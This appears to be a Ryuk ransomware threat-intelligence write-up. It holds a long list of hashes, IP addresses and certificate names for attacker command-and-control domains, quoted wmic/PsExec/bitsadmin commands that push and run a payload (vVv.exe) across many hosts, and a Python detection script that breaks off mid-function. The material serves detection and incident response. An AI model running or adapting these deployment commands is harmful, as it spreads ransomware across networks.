        0d3b79158ceee5b6ce859bb3fc501b02

        3/9/20

        194.26.29.220:443

        CN=fourservicehelper[.]com

        831e0445ea580091275b7020f2153b08

        3/11/20

        207.246.67.70:80

        CN=servicesecurity[.]org

        d89f6bdc59ed5a1ab3c1ecb53c6e571c

        3/13/20

        165.227.196.0:443

        CN=twentiethservicehelper[.]com

        977b4abc6307a9b3732229d4d8e2c277

        3/14/20

        45.141.86.91:443

        CN=thirdservice-developer[.]com

        edc2680e3797e11e93573e523bae7265

        3/14/20

        194.26.29.219:443

        CN=firstservisehelper[.]com

        6b444a2cd3e12d4c3feadec43a30c4d6

        3/14/20

        45.141.86.93:443

        CN=fifthservice-developer[.]com

        60e7500c809f12fe6be5681bd41a0eda

        3/15/20

        45.141.86.90:443

        CN=secondservice-developer[.]com

        de9460bd6b1badb7d8314a381d143906

        3/15/20

        45.141.86.84:443

        CN=firstservice-developer[.]com

        6385acd425e68e1d3fce3803f8ae06be

        3/17/20

        45.141.86.96:443

        CN=eithtservice-developer[.]com

        e1d1fb4a6f09fb54e09fb27167028303

        3/17/20

        45.141.86.92:443

        CN=fourthservice-developer[.]com

        5b5375bf30aedfa3a44d758fe42fccba

        3/18/20

        45.141.86.94:443

        CN=sixthservice-developer[.]com

        4d42bea1bfc7f1499e469e85cf75912c

        3/18/20

        108.61.209.121:443

        CN=service-booster[.]com

        692ed54fb1fb189c36d2f1674db47e45

        3/18/20

        134.122.116.114:443

        CN=service-helpes[.]com

        ad0914f72f1716d810e7bd8a67c12a71

        3/18/20

        209.97.130.197:443

        CN=helpforyourservice[.]com

        00fe3cc532f876c7505ddbf5625de404

        3/18/20

        192.241.143.121:443

        CN=serviceshelps[.]com

        e50998208071b4e5a70110b141542747

        3/18/20

        45.141.86.95:443

        CN=seventhservice-developer[.]com

        413ca4fa49c3eb6eef0a6cbc8cac2a71

        3/18/20

        198.211.116.199:443

        CN=actionshunter[.]com

        8e5bedbe832d374b565857cce294f061

        3/18/20

        45.141.86.155:443

        CN=sexyservicee[.]com

        cca37e58b23de9a1db9c3863fe2cd57c

        3/19/20

        194.26.29.239:443

        CN=eleventhserviceupdater[.]com

        7e0fcb78055f0eb12bc8417a6933068d

        3/19/20

        45.141.86.206:443

        CN=servicedhunter[.]com

        fdefb427dcf3f0257ddc53409ff71d22

        3/19/20

        45.141.86.92:443

        CN=service-updateer[.]com

        51ba9c03eac37751fe06b7539964e3de

        3/19/20

        134.122.116.59:443

        CN=servicedbooster[.]com

        db7797a20a5a491fb7ad0d4c84acd7e8

        3/19/20

        134.122.118.46:443

        CN=servicedpower[.]com

        7b57879bded28d0447eea28bacc79fb5

        3/19/20

        134.122.124.26:443

        CN=serviceboostnumberone[.]com

        880982d4781a1917649ce0bb6b0d9522

        3/20/20

        45.141.86.97:443

        CN=ninethservice-developer[.]com

        e4a720edfcc7467741c582cb039f20e0

        3/20/20

        178.62.247.205:443

        CN=top-serviceupdater[.]com

        a45522bd0a26e07ed18787c739179ccb

        3/20/20

        159.203.36.61:443

        CN=yourserviceupdater[.]com

        7b422c90dc85ce261c0a69ba70d8f6b5

        3/20/20

        134.122.20.117:443

        CN=fifthserviceupdater[.]com

        99aa16d7fc34cdcc7dfceab46e990f44

        3/23/20

        165.22.125.178:443

        CN=servicemonsterr[.]com

        82abfd5b55e14441997d47aee4201f6d

        3/24/20

        69.55.60.140:443

        CN=boostyourservice[.]com

        7f3787bf42f11da321461e6db7f295d1

        3/24/20

        45.141.86.98:443

        CN=tenthservice-developer[.]com

        eef29bcbcba1ce089a50aefbbb909203

        3/26/20

        178.79.132.82:443

        CN=developmasters[.]com

        5cf480eba910a625e5e52e879ac5aecb

        3/26/20

        194.26.29.247:443

        CN=thirteenthservicehelper[.]com

        2486df3869c16c0d9c23a83cd61620c2

        5/4/20

        159.65.216.127:443

        CN=info-develop[.]com

        5f7a5fb72c6689934cc5d9c9a681506b

        9/22/20

        69.61.38.155:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=gtrsqer[.]com

        d37ba4a4b1885e96ff54d1f139bf3f47

        9/22/20

        96.9.225.144:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=hakunaman[.]com

        4408ba9d63917446b31a0330c613843d

        9/22/20

        96.9.209.216:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=caonimas[.]com

        d921dd1ba03aaf37d5011020577e8147

        9/22/20

        107.173.58.176:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=chalengges[.]com

        dfeb6959b62aff0b93ca20fd40ef01a8

        9/22/20

        96.9.225.143:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=reginds[.]com

        05c03b62dea6ec06006e57fd0a6ba22e

        9/22/20

        69.61.38.156:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=errvghu[.]com

        c14a892f8203a04c7e3298edfc59363a

        9/22/20

        45.34.6.229:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=harddagger[.]com

        7ed16732ec21fb3ec16dbb8df0aa2250

        9/22/20

        45.34.6.226:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=getinformationss[.]com

        1788068aff203fa9c51d85bf32048b9c

        9/22/20

        45.34.6.225:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=gameleaderr[.]com

        0fff2f721ad23648175d081672e77df4

        9/22/20

        107.173.58.185:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=razorses[.]com

        b960355ba112136f93798bf85e6392bf

        9/22/20

        107.173.58.183:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=nomadfunclub[.]com

        a3d4e6d1f361d9c335effdbd33d12e79

        9/22/20

        107.173.58.175:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=bouths[.]com

        e13fbdff954f652f14faf11b735c0ef8

        9/22/20

        185.184.223.194:443

        C=US,ST=CA,L=Texas,O=lol,OU=,CN=regbed[.]com

        67310b30bada4f77f8f336438890d8f2

        9/22/20

        109.70.236.134:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=vnuret[.]com

        ae74cbb9838688363b7928b06963c40a

        9/23/20

        64.44.131.103:443

        C=US,ST=TX,L=Texas,O=serviceswork,OU=,CN=serviceswork[.]net

        af518cc031807f43d646dc508685bcd3

        9/23/20

        69.61.38.157:443

        C=US,ST=TX,L=Texas,O=office,OU=,CN=moonshardd[.]com

        c8fd81d6d3c8cbb8256c470a613a7c7b

        9/23/20

        193.142.58.129:443

        C=US,ST=TX,L=Texas,O=zapored,OU=,CN=zapored[.]com

        5a22c3c8a0ed6482cad0e2b867c4c10c

        9/23/20

        45.34.6.223:443

        C=US,ST=TX,L=Texas,O=office,OU=,CN=hurrypotter[.]com

        bf598ba46f47919c264514f10ce80e34

        9/23/20

        107.173.58.179:443

        C=US,ST=TX,L=Texas,O=office,OU=,CN=biliyilish[.]com

        1c8243e2787421373efcf98fc0975031

        9/23/20

        45.34.6.222:443

        C=US,ST=TX,L=Texas,O=dagger,OU=,CN=daggerclip[.]com

        576d65a68900b270155c2015ac4788bb

        9/23/20

        107.173.58.180:443

        C=US,ST=TX,L=Texas,O=office,OU=,CN=blackhoall[.]com

        69643e9b1528efc6ec9037b60498b94c

        9/23/20

        107.173.58.182:443

        C=US,ST=TX,L=Texas,O=office,OU=,CN=checkhunterr[.]com

        ca9b7e2fcfd35f19917184ad2f5e1ad3

        9/23/20

        45.34.6.221:443

        C=US,ST=TX,L=Texas,O=office,OU=,CN=check4list[.]com

        e5e0f017b00af6f020a28b101a136bad

        9/24/20

        213.252.244.62:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=ayiyas[.]com

        8367a1407ae999644f25f665320a3899

        9/24/20

        185.25.50.167:443

        C=US,ST=TX,L=Texas,O=office,OU=,CN=chainnss[.]com

        34a78f1233e53010d29f2a4fa944c877

        9/30/20

        88.119.171.75:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=martahzz[.]com

        eaebbe5a3e3ea1d5992a4dfd4af7a749

        10/1/20

        88.119.171.74:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=jonsonsbabyy[.]com

        adc8cd1285b7ae62045479ed39aa37f5

        10/1/20

        88.119.171.55:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=tiancaii[.]com

        bfe1fd16cd4169076f3fbaab5afcbe12

        10/1/20

        88.119.171.67:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=cantliee[.]com

        c8a623eb355d172fc3e083763934a7f7

        10/1/20

        88.119.171.76:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=realgamess[.]com

        0ac5659596008e64d4d0d90dfb6abe7c

        10/1/20

        88.119.171.68:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=maybebaybe[.]com

        48003b6b638dc7e79e75a581c58f2d77

        10/1/20

        88.119.171.69:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=saynoforbubble[.]com

        5c75a6bbb7454a04b9ea26aa80dfbcba

        10/1/20

        88.119.171.73:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=chekingking[.]com

        e391c997b757424d8b2399cba4733a60

        10/1/20

        88.119.171.77:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=wondergodst[.]com

        035697cac0ee92bb4d743470206bfe9a

        10/1/20

        88.119.171.78:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=zetrexx[.]com

        fc133bed713608f78f9f112ed7498f32

        10/1/20

        213.252.244.38:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=mountasd[.]com

        8ead6021e2a5b9191577c115d4e68911

        10/1/20

        107.173.58.184:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=pudgeee[.]com

        1c9949d20441df2df09d13778b751b65

        10/1/20

        88.119.174.109:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=loockfinderrs[.]com

        c0ddfc954aa007885b467f8c4f70ad75

        10/1/20

        88.119.174.110:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=puckhunterrr[.]com

        ee63098506cb82fc71a4e85043d4763f

        10/1/20

        88.119.174.114:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=voiddas[.]com

        422b020be24b346da826172e4a2cf1c1

        10/1/20

        88.119.174.116:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=sibalsakie[.]com

        8d8f046e963bcd008fe4bbed01bed4c8

        10/1/20

        88.119.174.117:443

        C=US,ST=TX,L=TExas,O=lol,OU=,CN=rapirasa[.]com

        c381fb63e9cb6b0fc59dfaf6e8c40af3

        10/1/20

        88.119.174.118:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=raidbossa[.]com

        add6b742d0f992d56bede79888eef413

        10/1/20

        88.119.174.119:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=lindasak[.]com

        9bbd073033e34bfd80f658f0264f6fae

        10/1/20

        88.119.174.121:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=bithunterr[.]com

        9afef617897e7089f59c19096b8436c8

        10/1/20

        88.119.174.120:443

        C=US,ST=TX,L=Texas,O=office,OU=,CN=giveasees[.]com

        3f366e5f804515ff982c151a84f6a562

        10/1/20

        88.119.174.107:443

        C=US,ST=TX,L=Texas,O=office,OU=,CN=shabihere[.]com

        c2f99054e0b42363be915237cb4c950b

        10/1/20

        88.119.174.125:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=tarhungangster[.]com

        4ac8ac12f1763277e35da08d8b9ea394

        10/1/20

        88.119.174.126:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=imagodd[.]com

        7080547306dceb90d809cb9866ed033c

        10/1/20

        88.119.174.127:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=raaidboss[.]com

        03037dff61500d52a37efd4b4f520518

        10/1/20

        88.119.174.128:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=sunofgodd[.]com

        959bed7a2662d7274b303f3b120fddea

        10/1/20

        213.252.244.126:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=hungrrybaby[.]com

        1d28556cc80df9627c20316358b625d6

        10/1/20

        213.252.244.170:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=loxliver[.]com

        85e65803443046f921b9a0a9b8cc277c

        10/1/20

        213.252.246.154:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=servicegungster[.]com

        9df6ba82461aa0594ead03993c0e4c42

        10/5/20

        5.2.64.113:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=qascker[.]com

        18aadee1b82482c3cd5ebe32f3628f3f

        10/7/20

        5.2.79.122:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=cheapshhot[.]com

        94bc44bd438d2e290516d111782badde

        10/7/20

        88.119.171.94:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=havemosts[.]com

        f0ede92cb0899a9810a67d716cdbebe2

        10/7/20

        5.2.64.133:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=mixunderax[.]com

        e0f9efedd11d22a5a08ffb9c4c2cbb5a

        10/7/20

        5.2.64.135:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=bugsbunnyy[.]com

        4aa2acabeb3ff38e39ed1d840124f108

        10/7/20

        5.2.72.202:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=sweetmonsterr[.]com

        c04034b78012cca7dcc4a0fb5d7bb551

        10/7/20

        88.119.175.153:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=zhameharden[.]com

        2670bf08c43d995c74b4b83383af6a69

        10/7/20

        213.252.245.71:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=serviceboosterr[.]com

        127cc347b711610c3bcee434eb8bf822

        10/7/20

        213.252.246.144:443

        C=US,ST=TX,L=Texas,O=US,OU=,CN=servicewikii[.]com

        b3e7ab478ffb0213017d57a88e7b2e3b

        10/7/20

        5.2.64.149:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=sobcase[.]com

        188f603570e7fa81b92906af7af177dc

        10/7/20

        5.2.64.144:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=unlockwsa[.]com

        22d7f35e624b7bcee7bb78ee85a7945c

        10/7/20

        88.119.174.139:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=serviceupdatter[.]com

        12c6e173fa3cc11cc6b09b01c5f71b0c

        10/7/20

        88.119.174.133:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=service-boosterr[.]com

        28435684c76eb5f1c4b48b6bbc4b22af

        10/7/20

        88.119.175.214:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=dotmaingame[.]com

        9c2d64cf4e8e58ef86d16e9f77873327

        10/7/20

        5.2.72.200:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=wodemayaa[.]com

        f6f484baf1331abf55d06720de827190

        10/7/20

        5.2.79.10:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=hybriqdjs[.]com

        d8eacda158594331aec3ad5e42656e35

        10/7/20

        5.2.79.12:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=gunsdrag[.]com

        29032dd12ea17fc37ffff1ee94cc5ba8

        10/7/20

        5.2.79.121:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=gungameon[.]com

        eaf32b1c2e31e4e7b6d5c3e6ed6bff3d

        10/7/20

        5.2.64.174:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=quwasd[.]com

        442680006c191692fcc3df64ec60d8fa

        10/7/20

        5.2.64.172:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=remotessa[.]com

        0593cbf6b3a3736a17cd64170e02a78d

        10/7/20

        5.2.64.167:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=secondlivve[.]com

        38df81824bd8cded4a8fa7ad9e4d1f67

        10/7/20

        5.2.64.182:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=luckyhunterrs[.]com

        99dbe71ca7b9d4a1d9f722c733b3f405

        10/7/20

        88.119.171.97:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=servicesupdater[.]com

        7d7199ffa40c50b6e5b025b8cb2661b2

        10/7/20

        88.119.171.96:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=servicemount[.]com

        f433d25a0dad0def0510cd9f95886fdb

        10/7/20

        96.9.209.217:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=fastbloodhunter[.]com

        e84c7aa593233250efac903c19f3f589

        10/7/20

        69.61.38.132:443

        C=US,ST=CA,L=Mountainvew,O=Office,OU=,CN=kungfupandasa[.]com

        e6e80f6eb5cbfc73cde40819007dcc53

        10/13/20

        45.147.230.131:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=bakcup-monster[.]com

        4fdeab3dad077589d52684d35a9ea4ab

        10/13/20

        45.147.229.92:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=bakcup-checker[.]com

        b70cdb49b26e6e9ba7d0c42d5f3ed3cb

        10/13/20

        45.147.229.68:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=backup-simple[.]com

        57024c1fe5c4acaf30434ba1f58f9144

        10/13/20

        45.147.229.52:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=backup-leader[.]com

        ec5496048f1962494d239d377e53db0c

        10/13/20

        45.147.229.44:443

        C=US,ST=TX,L=Texsa,O=lol,OU=,CN=backup-helper[.]com

        938593ac1c8bdb2c5256540d7c8476c8

        10/14/20

        45.147.230.87:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=nasmastrservice[.]com

        cced46e0a9b6c382a97607beb95f68ab

        10/14/20

        45.147.230.159:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=service-leader[.]com

        e912980fc8e9ec1e570e209ebb163f65

        10/14/20

        45.147.230.141:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=service-checker[.]com

        39d7160ce331a157d3ecb2a9f8a66f12

        10/14/20

        45.147.230.140:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=nas-simple-helper[.]com

        d9ca73fe10d52eef6952325d102f0138

        10/14/20

        45.147.230.133:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=nas-leader[.]com

        920d04330a165882c8076c07b00e1d93

        10/14/20

        45.147.230.132:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=boost-servicess[.]com

        771463611a43ee35a0ce0631ef244dee

        10/14/20

        45.147.229.180:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=elephantdrrive[.]com

        1e4a794da7d3c6d0677f7169fbe3b526

        10/14/20

        45.147.230.159:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=service-leader[.]com

        9c7fe10135f6ad96ded28fac51b79dfd

        10/15/20

        45.147.230.132:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=boost-servicess[.]com

        a78c0e2920e421667ae734d923dd5ca6

        10/15/20

        45.138.172.95:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=service-hellper[.]com

        a0b2378ceae498f46401aadeb278fb31

        10/16/20

        108.62.12.119:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=top-backuphelper[.]com

        e95bb7804e3add830496bd36664ed339

        10/16/20

        108.62.12.105:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=best-nas[.]com

        8d5dc95b3bd4d16a3434b991a09bf77e

        10/16/20

        108.62.12.114:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=top-backupservice[.]com

        d5de2f5d2ca29da1724735cdb8fbc63f

        10/16/20

        108.62.12.116:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=bestservicehelper[.]com

        9c7396ecd107ee8f8bf5521afabb0084

        10/16/20

        45.147.230.141:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=service-checker[.]com

        1134a6f276f4297a083fc2a605e24f70

        10/16/20

        45.147.230.140:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=nas-simple-helper[.]com

        2150045f476508f89d9a322561b28ff9

        10/16/20

        45.147.230.133:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=nas-leader[.]com

        f4ddc4562e5001ac8fdf0b7de079b344

        10/19/20

        74.118.138.137:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=top3-services[.]com

        75fb6789ec03961c869b52336fa4e085

        10/19/20

        74.118.138.115:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=simple-backupbooster[.]com

        9f5e845091015b533b59fe5e8536a435

        10/19/20

        108.177.235.53:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=best-backup[.]com

        4b78eaa4f2748df27ebf6655ea8a7fe9

        10/19/20

        74.118.138.138:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=topbackup-helper[.]com

        bcccda483753c82e62482c55bc743c16

        10/21/20

        45.153.241.1:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=backup1helper[.]com

        672c66dd4bb62047bb836bd89d2e1a65

        10/21/20

        45.153.240.240:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=checktodrivers[.]com

        6825409698a326cc319ca40cd85a602e

        10/21/20

        45.153.240.194:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=driver1master[.]com

        7f9be0302da88e0d322e5701d52d4128

        10/21/20

        45.153.240.138:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=boost-yourservice[.]com

        2c6a0856d1a75b303337ac0807429e88

        10/21/20

        45.153.240.136:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=backup1master[.]com

        6559dbf8c47383b7b493500d7ed76f6a

        10/23/20

        45.153.240.157:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=driver1updater[.]com

        7bd044e0a6689ef29ce23e3ccb0736a3

        10/23/20

        45.153.240.178:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=service1updater[.]com

        9859a8336d097bc30e6e5c7a8279f18e

        10/23/20

        45.153.240.220:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=driverdwl[.]com

        43fb2c153b59bf46cf6f67e0ddd6ef51

        10/23/20

        45.153.240.222:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=viewdrivers[.]com

        22bafb30cc3adaa84fef747d589ab235

        10/23/20

        45.153.241.134:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=backups1helper[.]com

        31e87ba0c90bb38b986af297e4905e00

        10/23/20

        45.153.241.138:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=driver1downloads[.]com

        f8a14846b7da416b14303bced5a6418f

        10/23/20

        45.153.241.146:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=servicehel[.]com

        01abdaf870d859f9c1fd76f0b0328a2b

        10/23/20

        45.153.241.153:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=service-hel[.]com

        c2eaf144e21f3aef5fe4b1502d318ba6

        10/23/20

        45.153.241.158:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=servicereader[.]com

        de54af391602f3deea19cd5e1e912316

        10/23/20

        45.153.241.167:443

        C=US,ST=TX,L=Texas,O=US,OU=,CN=view-backup[.]com

        5f6fa19ffe5735ff81b0e7981a864dc8

        10/23/20

        45.147.231.222:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=top3servicebooster[.]com

        ff54a7e6f51a850ef1d744d06d8e6caa

        10/23/20

        45.153.241.141:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=service1view[.]com

        4cda9d0bece4f6156a80967298455bd5

        10/26/20

        74.118.138.139:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=topbackupintheworld[.]com

        e317485d700bf5e8cb8eea1ec6a72a1a

        10/26/20

        108.62.12.12:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=topservice-masters[.]com

        e0022cbf0dd5aa597fee73e79d2b5023

        10/26/20

        108.62.12.121:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=topservicebooster[.]com

        44e7347a522b22cdf5de658a4237ce58

        10/26/20

        172.241.27.65:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=backup1services[.]com

        cd3e51ee538610879d6fa77fa281bc6f

        10/26/20

        172.241.27.68:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=backupmaster-service[.]com

        04b6aec529b3656040a68e17afdabfa4

        10/26/20

        172.241.27.70:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=backupmasterservice[.]com

        200c25c2b93203392e1acf5d975d6544

        10/26/20

        45.153.241.139:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=driver-boosters[.]com

        9d7c52c79f3825baf97d1318bae3ebe2

        10/27/20

        45.153.241.14:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=service1update[.]com

        5bae28b0d0e969af2c0eda21abe91f35

        10/28/20

        190.211.254.154:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=driverjumper[.]com

        a1e62e7e547532831d0dd07832f61f54

        10/28/20

        81.17.28.70:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=service1boost[.]com

        67c7c75d396988ba7d6cd36f35def3e4

        10/28/20

        81.17.28.105:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=idrivehepler[.]com

        880e59b44e7175e62d75128accedb221

        10/28/20

        179.43.160.205:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=idrivedownload[.]com

        cdea09a43bef7f1679e9cd1bbeb4b657

        10/28/20

        179.43.158.171:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=idrivefinder[.]com

        512c6e39bf03a4240f5a2d32ee710ce5

        10/28/20

        179.43.133.44:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=idrivedwn[.]com

        87f3698c743f8a1296babf9fbebafa9f

        10/28/20

        179.43.128.5:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=idrivecheck[.]com

        6df66077378c5943453b36bd3a1ed105

        10/28/20

        179.43.128.3:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=idriveupdate[.]com

        9706fd787a32a7e94915f91124de3ad3

        10/28/20

        81.17.28.122:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=idriveview[.]com

        0e1b0266de2b5eaf427f5915086b4d7c

        RYUK Commands

        start wmic /node:@C:\share$\comps1.txt /user:[REDACTED] /password:[REDACTED] process call create "cmd.exe /c bitsadmin /transfer vVv \\[REDACTED]\share$\vVv.exe %APPDATA%\vVv.exe & %APPDATA%\vVv.exe"

        start PsExec.exe /accepteula @C:\share$\comps1.txt -u [REDACTED] -p [REDACTED] cmd /c COPY "\\[REDACTED]\share$\vVv.exe" "C:\windows\temp\vVv.exe"

        start PsExec.exe -d @C:\share$\comps1.txt -u [REDACTED] -p [REDACTED] cmd /c c:\windows\temp\vVv.exe
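        As an added defender-side illustration (not code from the FireEye post), the Python below grades process-creation command lines for the observables visible in the RYUK distribution commands above: fan-out through wmic /node:@file or PsExec @file, inline credentials, a hidden dollar-suffixed share as the payload source, and an executable staged in %APPDATA% or Windows\temp. The sample command lines, host names, user and password values are constructed placeholders, and the rule names are labels chosen for this example, not vendor signature names.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample process-creation command lines (no real telemetry). The first
# three mirror the RYUK distribution commands quoted above, with placeholder host,
# user and password values; the remaining three are ordinary admin activity that
# the rules should leave alone.
SAMPLE_COMMAND_LINES = [
    r'wmic /node:@C:\share$\comps1.txt /user:CORP\svc-placeholder /password:PLACEHOLDER '
    r'process call create "cmd.exe /c bitsadmin /transfer vVv \\FILESRV\share$\vVv.exe '
    r'%APPDATA%\vVv.exe & %APPDATA%\vVv.exe"',
    r'PsExec.exe /accepteula @C:\share$\comps1.txt -u CORP\svc-placeholder -p PLACEHOLDER '
    r'cmd /c COPY "\\FILESRV\share$\vVv.exe" "C:\windows\temp\vVv.exe"',
    r'PsExec.exe -d @C:\share$\comps1.txt -u CORP\svc-placeholder -p PLACEHOLDER '
    r'cmd /c c:\windows\temp\vVv.exe',
    r'wmic /node:WS042 os get caption',
    r'PsExec.exe \\WS042 -s ipconfig /all',
    r'bitsadmin /transfer update https://updates.example.com/agent.msi C:\ProgramData\agent.msi',
]

# One rule per observable in the quoted commands (names are this example's own labels).
RULES = {
    # wmic told to run "process call create" against every host in a list file
    "fan_out_wmic_process_create": re.compile(
        r"\bwmic\b.*?/node:@\S+.*?\bprocess\s+call\s+create\b", re.I),
    # PsExec given an @file of target hosts instead of a single \\host
    "fan_out_psexec_hostlist": re.compile(
        r"\bpsexec(?:\.exe)?\b.*?\s@\S+", re.I),
    # credentials passed inline to a remote-execution tool
    "inline_credentials": re.compile(
        r"\b(?:wmic|psexec(?:\.exe)?)\b.*?(?:/password:\S+|\s-p\s+\S+)", re.I),
    # payload pulled over UNC from a hidden (dollar-suffixed) share
    "hidden_share_source": re.compile(
        r'\\\\[^\\\s"]+\\[^\\\s"]+\$\\', re.I),
    # executable staged in or launched from %APPDATA% or Windows\temp
    "staging_dir_executable": re.compile(
        r'(?:%APPDATA%|\\windows\\temp)\\[^\s"&]+\.exe', re.I),
}

FAN_OUT_RULES = {"fan_out_wmic_process_create", "fan_out_psexec_hostlist"}


@dataclass
class Finding:
    cmdline: str
    rules: List[str] = field(default_factory=list)
    severity: str = "none"
    host_list_file: Optional[str] = None


def host_list_file(cmdline: str) -> Optional[str]:
    """Return the @file path a fan-out command reads its targets from, if any.

    In incident response this file is the fastest way to enumerate the hosts
    the encryptor was pushed to, so it is surfaced explicitly.
    """
    m = re.search(r"@((?:[A-Za-z]:\\|\\\\)\S+)", cmdline)
    return m.group(1) if m else None


def analyze(cmdline: str) -> Finding:
    """Apply every rule to one command line and grade the result."""
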